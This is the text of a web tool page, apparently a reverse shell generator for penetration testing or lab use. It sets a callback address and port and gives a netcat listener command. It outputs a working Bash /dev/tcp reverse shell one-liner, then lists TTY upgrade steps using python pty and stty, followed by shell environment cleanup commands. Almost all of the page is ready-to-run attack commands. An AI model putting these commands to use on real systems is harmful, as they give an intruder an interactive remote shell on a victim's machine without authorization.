Reverse Shell Builder
Target & Callback
Callback endpoint
10.10.14.3:4444IP
Port
Random ports avoid common services such as SSH, HTTP/S, DNS, databases, Redis, Docker, and common dev ports.
Listener command
Command to run
$nc -lvnp 4444Target profile
Target OS
CPU architecture
Outbound access
Tools available on target
Leave tools unselected when you are not sure what exists on the target.
Technique & Command
Mode
Runtime / tool
Shell path
High fit 95%Matches the selected target OS.
Technique7 / 138
Reverse TCP callbacklinux
Bash /dev/tcp · linux · Classic Bash TCP redirection one-liner.
Obfuscation & Encoding
Transform
Only compatible transforms are shown.
Command output
$/bin/bash -i >& /dev/tcp/10.10.14.3/4444 0>&1Session Upgrade
TTY upgrade
Upgrade recipe
Replace the fixed size with your terminal dimensions: stty rows $(tput lines) columns $(tput cols)
Upgrade steps
$python3 -c 'import pty; pty.spawn("/bin/bash")' || python -c 'import pty; pty.spawn("/bin/bash")' $Ctrl-Z $stty raw -echo; fg $reset $export TERM=xterm-256color $stty rows 40 columns 120
Session cleanup
Cleanup helper
Cleanup steps
$export SHELL=/bin/bash $export TERM=xterm-256color $export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH $alias ll='ls -la'